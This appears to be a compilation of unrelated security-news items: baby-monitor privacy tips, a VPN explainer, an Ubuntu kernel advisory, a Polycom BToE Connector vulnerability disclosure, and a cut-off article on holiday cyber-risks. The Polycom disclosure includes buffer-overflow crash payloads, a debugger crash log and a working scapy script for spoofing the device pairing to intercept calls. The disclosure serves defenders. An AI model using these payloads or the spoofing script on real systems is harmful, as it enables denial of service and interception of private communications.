Categories: Personal
Tags: baby

Tags:  monitor

Tags:  wi-fi

Tags:  wireless

Tags:  cam

Tags:  webcam

Tags:  camera

Tags:  DECT

Tags:  FHSS

Tags:  cloud

Tags:  storage

Tags:  secure

Tags:  safety

Tags:  password

We take a look at some of the options available for your baby's monitor setup. Is Wi-Fi or something else the best fit for you and your family?



(Read more...)




The post Baby monitor safety: What you need to know appeared first on Malwarebytes Labs.

Do you have an impending new arrival in your family of the small and very noisy variety? If so, you’re probably going to invest in a baby monitor for peace of mind both at night and during the day. But do you know what kind of monitor you’re going to buy? Will it be audio only, or have images? Will it be Wi-Fi, or the non Wi-Fi kind? Did you _know_ there’s a non Wi-Fi kind?

As it happens, you don’t _have_ to buy an internet connected device for one of the most private areas of your home. There’s plenty of cheap Internet of Things (IoT) baby monitors out there with default passwords baked in, insecurely stored data, and an alarming amount of compromise stories in the news. If you wish, you can bypass this problem almost completely and go for a device entirely lacking in internet functionality.

The trade-off in this situation is that the device you buy won’t have as many features as a Wi-Fi product, such as the ability to check in on your baby on an app on your phone if you've got a babysitter for the evening. However, if all you really care about is monitoring your baby when you're not in the same room as them, then you can probably go for something more basic.

Non-internet connected baby monitors come with a standalone screen. These screens connect back to the camera in your child’s room. Instead of Wi-Fi, they use other technologies called Digital Enhanced Cordless Telecommunications (DECT) and Frequency Hopping Spread Spectrum (FHSS).

FHSS is one alternative to smart home networks and IoT devices. It rapidly switches frequency when in operation, which can mean a very low chance of someone trying to compromise the device. This isn’t to say a non Wi-Fi camera is unhackable, but given the short range of transmission for these devices, someone would have to be very close to your home to begin poking around. Much the same can be said with baby monitors that use DECT. 

An internet-connected baby monitor is more out of your control. Even if you lock things down at your end with secure passwords it could go wrong if the company you use reveals that footage of your child was stored on an open server somewhere.

In fact, the data doesn’t _need_ to be accidentally stored on an open server at all. Sometimes, the people responsible for keeping your information safe have other ideas in mind. Amazon's Ring was recently fined by the FTC after it was discovered that every employee had previously had access Ring videos, with some abusing that power to look through users' personal videos. The FTC also highlighted lack of proper security precautions related to warding off attacks, such as credential stuffing.

If you sign up to a home IoT system managed by one organisation, this is what you might be facing from the very entities you’re entrusting with the most personal details of your living space. It’s probably low risk, but it’s a risk all the same. With this in mind, if you want to go down the Wi-Fi route, here are some tips for securing your baby monitor.

**Tips for keeping your baby monitor safe**

1.  **Change your password:** Some cheap devices may ship with passwords that cannot be changed, ever. If this is the case, those passwords are almost certainly available online for anyone to see. Avoid those at all costs and get one where you can change the password. Then change the password as soon as you set up your monitor.
2.  **Make your password strong**: A weak password could let someone into your baby monitor and allow them to view videos, or even speak over the monitor.
3.  **Use multi-factor authentication (MFA)**: Pick a baby monitor that allows you to use multi-factor (or 2-factor) authentication. This means that even if someone manages to guess your password, they won't be able to get into your account.
4.  **Keep your videos stored locally:** There are perhaps specific reasons why you may want recordings from your child’s room stored somewhere. If so, go for a product which allows local saving. It’s simply not worth the risk of footage making its way into the cloud, and other people's hands.
5.  **Turn it off:** If you don’t need a camera enabled in your baby’s room, then consider powering it down when not needed. The window of opportunity for breaking into a device is made even smaller if nobody can access it, so when your baby is elsewhere just flip that switch.

As with all digital toys, really have a think about what you need in a device. If you don't need to see your baby over an app when you're away from home, then maybe there's no need for an internet enabled monitor. The more connected you make your home, the more potential security risks you introduce.

**We don’t just write about threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Baby monitor safety: What you need to know

By Waqas
Protect your online privacy with trustworthy VPNs. Shield your sensitive data from prying eyes and browse the internet…
This is a post from HackRead.com Read the original post: VPN for Privacy: Shielding Your Online Activities from Prying Eyes

Protect your online privacy with trustworthy VPNs. Shield your sensitive data from prying eyes and browse the internet safely from anywhere around the globe!

Using Virtual Private Networks (VPNs) is a necessary security and privacy precaution when surfing online or using corporate networks. They protect websites, hackers, and other evil actors from accessing users’ sensitive data, such as credit card numbers, bank account information, and passwords.

These VPNs also help you access the website from anywhere around the globe, even in a country with stringent internet censorship laws. This is because a VPN directs your internet traffic through a remote server, which may be situated in another country.

VPNs also aid in preventing identity theft, a problem growing widely in our digital age. By masking your IP address, VPNs provide you with security so no one can track you as they access private websites. Hence, VPNs are necessary for everyone who wishes to continue using the internet worry-free and safely.

**Why Online Privacy and Security is Necessary?**

It’s tempting to connect to public Wi-Fi networks while you’re on the go to reduce your mobile data usage. Nevertheless, such networking carries risks because it makes your internet activity accessible to hackers and other cybercriminals. 

Your online actions are protected when you use a VPN from unwanted parties like your internet service provider (ISP including those who help attackers), the government, and hackers. As a result, you can browse the internet confidently, knowing that your personal information is secure.

**Servers, secure tunnels, and protocols**

A VPN provider has numerous servers spread across the globe. Simply put, these servers are computers spread throughout the world running the VPN provider’s software. 

The client software allows you to select one of these several VPN servers before sending your data to that server over what is known as an encrypted tunnel. This refers to the encrypted link between your device and the VPN server, or more precisely, the client app and server software running on those servers.

Your data is secured before leaving your computer and encrypted the entire way to the VPN server, making this tunnel or connection secure. After being decrypted by the server’s software after receiving the data, the information can then be sent to its intended location on the internet. 

**VPN Types**

The goal of a VPN is to create a secure connection between two points, but it does not define what those points should be. This enables the usage of VPNs in a number of situations, including:

**Site-to-Site VPN**

This VPN aims to safely link two sites separated by geography. Nowadays, the majority of security gates come with VPN connectivity. The gateway encrypts the traffic supplied to the gateway at the other site and handles all traffic that travels between the two sites. The data is decrypted and sent to its destination through this gateway.

**Remote Access VPN**

Remote access VPN is a brief secured connection between the user’s device and the company’s data center. Only after the user enables it does it become operational. Otherwise, it needs a permanent link. Businesses use this kind of VPN to safely access the software and data in a central hub. Imagine it as a VPN connection creating a secure tunnel from your device to view confidential documents or business materials on the other end.

**VPN as a Service**

Cloud VPNs, also known as VPN as a Service (VPNaaS), are hosted in cloud infrastructure and use that server’s IP address to connect to the Internet rather than the client’s local address. Consumer VPNs frequently use this technique, allowing users to take necessary precautions when using the Internet via unreliable public Wi-Fi and offering some degree of anonymity.

**VPN Protocols and Their Types**

VPN protocols are guidelines and rules that a VPN program adheres to when establishing tunnelling modes with secure connections to facilitate information flows between your IP and another network, such as the open web or a private network

VPN protocol types include OpenVPN, WireGuard, L2TP/IPSec, IPSec/IKEv2, SSTP, and PPTP. VPNs use a variety of protocols since each one has benefits for particular VPN applications like cybersecurity, getting around censorship, and data vulnerability protection.

**Exactly how secure is a VPN?**

Many companies nowadays require that employees connect to internal networks over VPNs to reduce the danger of sensitive company data being traced or disclosed. Home-based networks are at lesser risk, but your internet service provider (ISP) can still monitor and share an online activity routed through your home internet connection. 

It’s also crucial to remember that VPNs operate differently than all-encompassing antivirus software. They will encrypt your internet history and safeguard your IP, but that is all they can do. For example, if you wrongfully click harmful links or download malicious softwares, they won’t keep you safe. Using a VPN does not eliminate the risk of Trojans, Malware, and Viruses.

Despite using a VPN, your system could be harmed if any of these were to get access to it. To guarantee the highest privacy standard, a VPN must be used with reliable anti-virus software.

**Choosing a Safe VPN Provider**

Free VPN services may sound nice, but every company must make a profit to cover expenses. Some free VPNs sell their users’ data, while others employ advertisements. Free also implies a slower connection and fewer services.

Secondly, almost all VPN services make the no logs claim. Though, this is untrue. In order to provide the Service, Most VPNs are required to save at least connection history. However, there might be some information you prefer to keep private, such as your browsing history Hence, you have to properly opt for and review the privacy statements of VPN providers before choosing one.

While your ISP cannot see your internet traffic, your VPN provider will. So, if your provider is compromised, you will be too. That’s why you must choose a provider whom you can trust. Before purchasing, It is advised to research and read reputable, unbiased reviews.

**_Editor’s note:_** It is strongly advised to avoid using free VPN services. Hackread.com recently published an exclusive report detailing a significant data breach involving SuperVPN, a VPN provider that promotes itself as a free and no-log service. The breach resulted in the exposure of personal information belonging to over 360 million users. Shockingly (or not so shockingly), the leaked data included user logs, despite the company’s claims of not storing such information.

**Conclusion**

When working remotely, connecting to a public Wi-Fi rather than your home network is equally problematic. While sometimes useful in places with sparse access to fixed and mobile internet, there is no way to be sure that someone else won’t join the same network to monitor your activities. Even if your traffic is encrypted, a hostile actor could still see the websites you visit, mainly if you use apps that lack encryption, which many do.

Hence, VPNs for internet privacy are crucial for maintaining and defending online security and privacy. They are incredibly reliable in securing users’ data from outside organizations by offering encryption algorithms, guaranteeing that everything is secure.

**RELATED ARTICLES**

1.  Identity Theft Statistics You Need to Know in 2023
2.  3 Cybersecurity Mistakes that Lead to Identity Theft
3.  Mullvad VPN and Tor Project Release Mullvad Browser
4.  WhatsApp Subverts Censorship with New Proxy Feature
5.  ProtonVPN’s extensions for Chrome and Firefox browsers

VPN for Privacy: Shielding Your Online Activities from Prying Eyes

Ubuntu Security Notice 6175-1 - Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in the netfilter subsystem of the Linux kernel when processing batch requests, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Gwangun Jung discovered that the Quick Fair Queueing scheduler implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6175-1  
June 16, 2023

linux, linux-aws, linux-lowlatency, linux-raspi vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-lowlatency: Linux low latency kernel  
- linux-raspi: Linux kernel for Raspberry Pi systems

Details:

Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in  
the netfilter subsystem of the Linux kernel when processing batch requests,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-32233)

Gwangun Jung discovered that the Quick Fair Queueing scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-31436)

Reima Ishii discovered that the nested KVM implementation for Intel x86  
processors in the Linux kernel did not properly validate control registers  
in certain situations. An attacker in a guest VM could use this to cause a  
denial of service (guest crash). (CVE-2023-30456)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform data buffer size validation in some  
situations. A physically proximate attacker could use this to craft a  
malicious USB device that when inserted, could cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1380)

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that the io_uring subsystem in the Linux kernel did not  
properly perform file table updates in some situations, leading to a null  
pointer dereference vulnerability. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2023-1583)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the Xircom PCMCIA network device driver in the Linux  
kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2023-1670)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that a race condition existed in the Xen transport layer  
implementation for the 9P file system protocol in the Linux kernel, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (guest crash) or expose sensitive information (guest  
kernel memory). (CVE-2023-1859)

It was discovered that a race condition existed in the Bluetooth HCI SDIO  
driver, leading to a use-after-free vulnerability. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-1989)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that the perf subsystem in the Linux kernel contained a  
use-after-free vulnerability. A privileged local attacker could possibly  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-2235)

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu  
Linux kernel contained a race condition when handling inode locking in some  
situations. A local attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2023-2612)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the Bluetooth subsystem in the Linux kernel did not  
properly initialize some data structures, leading to an out-of-bounds  
access vulnerability in certain situations. An attacker could use this to  
expose sensitive information (kernel memory). (CVE-2023-28866)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

It was discovered that the BQ24190 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33288)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   linux-image-6.2.0-1005-aws      6.2.0-1005.5  
   linux-image-6.2.0-1005-lowlatency  6.2.0-1005.5  
   linux-image-6.2.0-1005-lowlatency-64k  6.2.0-1005.5  
   linux-image-6.2.0-1006-raspi    6.2.0-1006.8  
   linux-image-6.2.0-1006-raspi-nolpae  6.2.0-1006.8  
   linux-image-6.2.0-23-generic    6.2.0-23.23  
   linux-image-6.2.0-23-generic-64k  6.2.0-23.23  
   linux-image-6.2.0-23-generic-lpae  6.2.0-23.23  
   linux-image-aws                 6.2.0.1005.6  
   linux-image-generic             6.2.0.23.23  
   linux-image-generic-64k         6.2.0.23.23  
   linux-image-generic-lpae        6.2.0.23.23  
   linux-image-lowlatency          6.2.0.1005.5  
   linux-image-lowlatency-64k      6.2.0.1005.5  
   linux-image-raspi               6.2.0.1006.9  
   linux-image-raspi-nolpae        6.2.0.1006.9  
   linux-image-virtual             6.2.0.23.23

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6175-1  
   CVE-2022-4269, CVE-2023-1380, CVE-2023-1583, CVE-2023-1611,  
   CVE-2023-1670, CVE-2023-1855, CVE-2023-1859, CVE-2023-1989,  
   CVE-2023-1990, CVE-2023-2194, CVE-2023-2235, CVE-2023-2612,  
   CVE-2023-28466, CVE-2023-28866, CVE-2023-30456, CVE-2023-30772,  
   CVE-2023-31436, CVE-2023-32233, CVE-2023-33203, CVE-2023-33288

Package Information:  
   https://launchpad.net/ubuntu/+source/linux/6.2.0-23.23  
   https://launchpad.net/ubuntu/+source/linux-aws/6.2.0-1005.5  
   https://launchpad.net/ubuntu/+source/linux-lowlatency/6.2.0-1005.5  
   https://launchpad.net/ubuntu/+source/linux-raspi/6.2.0-1006.8

Ubuntu Security Notice USN-6175-1

Polycom BToE Connector version 4.4.0.0 suffers from remote buffer overflow and man-in-the-middle vulnerabilities.

    Microsoft® Lync™ Better Together over Ethernet (BToE) feature on Polycom® VVX® business media. phones enables you to control phone activity from your computer using your Lync client.The BToE feature enables you to place, answer, and hold audio and video calls from your Polycom VVX phone and your Lync client on your computer.#### Title: Polycom BToE Connector 4.4.0.0 Multiple Vulnerabilities#### Affected versions: 4.4.0.0#### Tested on: Windows 10 Enterprise (x64), Windows 11 Home (x64), PBC.exe (x86)#### Credits: echo1. Remote stack based buffer overflowPolycom BToE Connector in version 4.4.0.0 is prone to Remote Stack Based Buffer Overflow.Vulnerability occurs in handling the following BToE protocol tags:<QoSDSCPValue>, <MediaPort>, <Dtmf>, <SignInState> and is related to the lack of error checking after call strstr function.Value returned by strstr is next used to calculate size of data which will be passed to strncpy.Due to limitation imposed on us by recv function - direct control only over 1024 bytes of data - using this vulnerability to achieve Remote Code Execution is very hard (partial overwrite) or even impossible.0022DB5B | C68424 30020000 00       | mov byte ptr ss:[esp+230],0 |0022DB63 | 68 28D83000              | push pbc.30D828 | 30D828:"</QoSDSCPValue>\n"0022DB68 | 57                       | push edi |0022DB69 | 66:0FD68424 39020000     | movq qword ptr ss:[esp+239],xmm0 |0022DB72 | 83C6 0E                  | add esi,E |0022DB75 | C68424 41020000 00       | mov byte ptr ss:[esp+241],0 |0022DB7D | FF15 F4222E00            | call dword ptr ds:[<&strstr>] |0022DB83 | 8BF8                     | mov edi,eax | <- poiter returned by strstr (no error check!)0022DB85 | 8D8424 38020000          | lea eax,dword ptr ss:[esp+238] |0022DB8C | 2BFE                     | sub edi,esi | <- calculate the size of QoSDSCPValue value0022DB8E | 57                       | push edi |    (null - poiter)0022DB8F | 56                       | push esi |0022DB90 | 50                       | push eax |0022DB91 | FF15 CC242E00            | call dword ptr ds:[<&strncpy>] | <- (buffer overflow)0022DB97 | 83C4 14                  | add esp,14 |:POC:-- <MediaPort><?xml version="1.0" encoding="UTF-8" standalone="yes"?><response protocolVersion="1" requestId="2"><MediaPort>31337</MediaPort>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-- <QoSDSCPValue><?xml version="1.0" encoding="UTF-8" standalone="yes"?><response><QoSDSCPValue>0</QoSDSCPValue>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:CRASH LOG:0:004> g(2d80.336c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 edi=00f6fffdeip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010206ucrtbase!strncpy+0x109:774028e9 8907            mov     dword ptr [edi],eax ds:002b:00f6fffd=????????0:003> g(2d80.336c): Unknown exception - code c00001a5 (!!! second chance !!!)eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 edi=00f6fffdeip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010206ucrtbase!strncpy+0x109:774028e9 8907            mov     dword ptr [edi],eax ds:002b:00f6fffd=????????0:003> kb  # ChildEBP RetAddr  Args to Child00 00f6d97c 002b9942 00f6e248 00f6d9d3 ff09262d ucrtbase!strncpy+0x109WARNING: Stack unwind information not available. Following frames may be wrong.01 00f6e284 41414141 41414141 41414141 41414141 PBC+0x994202 00f6e288 41414141 41414141 41414141 41414141 0x4141414103 00f6e28c 41414141 41414141 41414141 41414141 0x4141414104 00f6e290 41414141 41414141 41414141 41414141 0x4141414105 00f6e294 41414141 41414141 41414141 41414141 0x4141414106 00f6e298 41414141 41414141 41414141 41414141 0x4141414107 00f6e29c 41414141 41414141 41414141 41414141 0x4141414108 00f6e2a0 41414141 41414141 41414141 41414141 0x4141414109 00f6e2a4 41414141 41414141 41414141 41414141 0x414141410a 00f6e2a8 41414141 41414141 41414141 41414141 0x414141410b 00f6e2ac 41414141 41414141 41414141 41414141 0x414141410c 00f6e2b0 41414141 41414141 41414141 41414141 0x414141410d 00f6e2b4 41414141 41414141 41414141 41414141 0x414141410e 00f6e2b8 41414141 41414141 41414141 41414141 0x414141410f 00f6e2bc 41414141 41414141 41414141 41414141 0x4141414110 00f6e2c0 41414141 41414141 41414141 41414141 0x4141414111 00f6e2c4 41414141 41414141 41414141 41414141 0x4141414112 00f6e2c8 41414141 41414141 41414141 41414141 0x4141414113 00f6e2cc 41414141 41414141 41414141 41414141 0x4141414114 00f6e2d0 41414141 41414141 41414141 41414141 0x4141414115 00f6e2d4 41414141 41414141 41414141 41414141 0x4141414116 00f6e2d8 41414141 41414141 41414141 41414141 0x4141414117 00f6e2dc 41414141 41414141 41414141 41414141 0x4141414118 00f6e2e0 41414141 41414141 41414141 41414141 0x4141414119 00f6e2e4 41414141 41414141 41414141 41414141 0x414141411a 00f6e2e8 41414141 41414141 41414141 41414141 0x414141411b 00f6e2ec 41414141 41414141 41414141 41414141 0x414141411c 00f6e2f0 41414141 41414141 41414141 41414141 0x414141411d 00f6e2f4 41414141 41414141 41414141 41414141 0x414141411e 00f6e2f8 41414141 41414141 41414141 41414141 0x414141411f 00f6e2fc 41414141 41414141 41414141 41414141 0x4141414120 00f6e300 41414141 41414141 41414141 41414141 0x4141414121 00f6e304 41414141 41414141 41414141 41414141 0x4141414122 00f6e308 41414141 41414141 41414141 41414141 0x4141414123 00f6e30c 41414141 41414141 41414141 41414141 0x4141414124 00f6e310 41414141 41414141 41414141 41414141 0x4141414125 00f6e314 41414141 41414141 41414141 41414141 0x4141414126 00f6e318 41414141 41414141 41414141 41414141 0x4141414127 00f6e31c 41414141 41414141 41414141 41414141 0x4141414128 00f6e320 41414141 41414141 41414141 41414141 0x4141414129 00f6e324 41414141 41414141 41414141 0000000a 0x414141412a 00f6e328 41414141 41414141 0000000a 00000000 0x414141412b 00f6e32c 41414141 0000000a 00000000 00000000 0x414141412c 00f6e330 00000000 00000000 00000000 00000000 0x414141412. Man in the middle / Device spoofingBToE protocol occurs in two versions, newer and legacy.Implementation of newer version of BToE in BToE Connector is based on openssl library and that version support server authenticityverification. Legacy BToE implementation is relying on plink tool from PuTTY and doesn't check server authenticity while establishing the connection to the server.An attacker which has access to the 2081 UDP port which the PBC.exe is listening on, can - based on the lack of server authenticityverification - send a specially crafted packet and pair system/lync of attacked user with the operating system of attacker choice. From this point, an attacker can intercept or/and modify all data - including phone records and SRTP streams - that are transferred between the attacked system/lync app and the user's phone (polycom device).:POC:[victim system]C:\Windows\System32>hostnamevictimC:\Windows\System32>ipconfigWindows IP ConfigurationWireless LAN adapter Wi-Fi:    Connection-specific DNS Suffix  . : NAT.in.evil.empire    Link-local IPv6 Address . . . . . : 2001:db8:3333:4444:5555:6666:7777:8888    IPv4 Address. . . . . . . . . . . : 192.168.0.11    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . : 192.168.0.1C:\Windows\System32>C:\Windows\System32>netstat -p UDP -a -n -bActive Connections   Proto  Local Address          Foreign Address        State   UDP    0.0.0.0:500            *:*   IKEEXT  [svchost.exe]   UDP    0.0.0.0:2081           *:*  [PBC.exe]  ...C:\Windows\System32>[attacker system]echo@attacker:~$ hostnameattackerecho@attacker:~$echo@attacker:~$ ip a...3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000     link/ether 80:91:33:9c:b9:9f brd ff:ff:ff:ff:ff:ff     inet 192.168.0.16/24 brd 192.168.0.255 scope global dynamic noprefixroute wlan0        valid_lft 3404sec preferred_lft 3404sec     inet6 1111::2222:3333:4444:5555/66 scope link noprefixroute        valid_lft forever preferred_lft foreverecho@attacker:~$root@attacker:/home# tail -n 1 /etc/passwdSynergy:x:1001:1001::/home/Synergy:/bin/bash  #pwd = Ch@mp$0FI1Croot@attacker:/home#root@attacker:/home# tail /etc/ssh/sshd_config# Example of overriding settings on a per-user basis#Match User anoncvs#       X11Forwarding no#       AllowTcpForwarding no#       PermitTTY no#       ForceCommand cvs serverAllowUsers Synergyroot@attacker:/home#echo@attacker:~$ cat /home/echo/Pulpit/BTOE/BToEMiTMPoc.py#!/usr/bin/python3import argparse, socketfrom scapy import all as scapydef packet(pbc_ip, pbc_port, phone_ip, phone_port):     fp_ip = phone_ip.split(".");     payload = struct.pack("BBBBHBBBBBBBBBBBBBBBBBBBBB",                           int(fp_ip[0]), int(fp_ip[1]), int(fp_ip[2]), int(fp_ip[3]),                           socket.htons(int(phone_port)),                           0x00, 0x04, 0xF3,5,8,9,10,11,12,1,13,14,15,16,17,18,19,0x1A, 0x1B, 0x1C, 0x1D);     packet = scapy.IP(dst=pbc_ip)/scapy.UDP(dport=pbc_port, sport=scapy.RandShort())/scapy.raw(payload);     scapy.send(packet, verbose=False);def poc():     opt = argparse.ArgumentParser(description='Process some integers.');     opt.add_argument('--pbc_ip', action='store',                      type=str,                      help='PBC.exe IPv4 address', required=True);     opt.add_argument('--pbc_port', action='store', type=int, help='PBC.exe UDP port', required=True);     opt.add_argument('--fake_phone_ip', action='store', type=str, help='Fake phone IPv4 address', required=True);     opt.add_argument('--fake_phone_port', action='store', type=str, help='Fake phone TCP port', required=True);     args = opt.parse_args()     packet(args.pbc_ip, args.pbc_port, args.fake_phone_ip, args.fake_phone_port);if __name__ == "__main__":    poc();echo@attacker:~$echo@attacker:~$ sudo python3 /home/echo/Pulpit/BTOE/BToEMiTMPoc.py --pbc_ip 192.168.0.11 --pbc_port 2081 --fake_phone_ip 192.168.0.16 --fake_phone_port 31337echo@attacker:~$ nc -l -v -p 31337listening on [any] 31337 ...connect to [192.168.0.16] from attacker [192.168.0.16] 59680<?xml version="1.0" encoding="UTF-8" standalone="yes"?><request  protocolVersion="1" requestId="2"><GruuRequest></GruuRequest></request>####:Recommendation:Since there are still no official fixes, I suggest you to consider blocking plink.exe from location "C:\Program Files [(x86)]\Polycom\Polycom BToE Connector"in order to disable legacy BToE support in BToE Connector.####:Disclosure Timeline:20.02.2023 – Initial contact with security@poly.com.22.02.2023 – Sending details to HP.06.03.2023 - HP/Poly plans the work schedule and fixes for product.13.03.2023 – HP/Poly was informed about 90 days disclosure policy.10.05.2023 – Request for status.11.05.2023 – Release is planning on mid-June.13.06.2023 - Request for status.15.06.2023 - Publication.-----BEGIN PGP PUBLIC KEY BLOCK-----xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQm0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLloMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVTHhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEBB0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYhBFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/YPBCvA4bkQ9SA37Ak2UDDg===6VCh-----END PGP PUBLIC KEY BLOCK-----

Polycom BToE Connector 4.4.0.0 Buffer Overflow / Man-In-The-Middle

Organizations need to prepare for security threats as summer holidays approach.

Summer is just around the corner, and every cybersecurity professional I know is braced for cybercriminals to take action. The Cybersecurity ad Infrastructure Security Agency (CISA), part of the Department of Homeland Security, warns that holidays are a period of heightened threat. That can be extrapolated to any time cybercriminals think IT security teams might be lean or preoccupied, such as the summer season, when workers typically take more time off and stay out of the office for longer.

Here are four top considerations to help IT security staff manage risks — even when they're short staffed with holidays and vacation schedules.

**1\. Beware of Taking Work and Hardware on Vacation**

From the malicious intentions of a thief to a well-intentioned passerby going through a device to reach its owner and seeing sensitive information, lost hardware can evolve from an inconvenience to a corporate reputation and compliance nightmare.

To avoid the risk of lost hardware, it's best practice for employees to leave company devices at home unless they need to work while traveling — especially when it comes to international travel. As a precaution in the event devices are lost or stolen, employees should keep any devices with company information locked. IT departments should mandate phishing-resistant multifactor authentication, require employees to change passwords at least every six months, implement stringent password requirements, or explore passwordless validation options.

**2\. Avoid Open Wi-fi and Public USB Ports**

While many employees are aware of the risks associated with using public Wi-Fi and charging ports, the convenience of sending a quick email from the airport or using public power outlets may be difficult to resist. It's essential to remain vigilant, because of the dangers of sneaky threat actors tapping into shared networks and infiltrating personal devices or corporate systems.

According to one survey, 40% of respondents had their information compromised while using public Wi-Fi. The Federal Communications Commission warns about "juice jacking," in which bad actors target travelers running low on battery power and load malware onto public USB charging stations to hack into electronic devices.

Work travel and quick check-ins while in transit make it difficult to completely avoid working in public. To avoid the security, compliance, and reputation risk of a hack, instruct employees on secure mobile working practices. Employees should use known, secure hotspots instead of connecting to public Wi-Fi. If Wi-Fi can't be avoided, they should use a virtual private network (VPN). Employees looking for a charge while on the go should only plug their chargers into AC power outlets, rather than public USB ports. This goes for company devices and personal devices that have access to company email or messaging applications, even if their primary use isn't for work.

**3\. Focus Security Training and Messaging About Holiday Cyber-Risks**

Many cyberattacks like ransomware happen on Friday afternoons, and if it's a holiday weekend, the risk is high. Threat actors rightly calculate that a distracted employee trying to wrap up their work week might inadvertently click a phishing link or a security team might be running with a skeleton crew because of vacation schedules. Due to this, organizations must especially fortify their defense posture and check crisis management/business continuity plans as we approach holiday weekends.

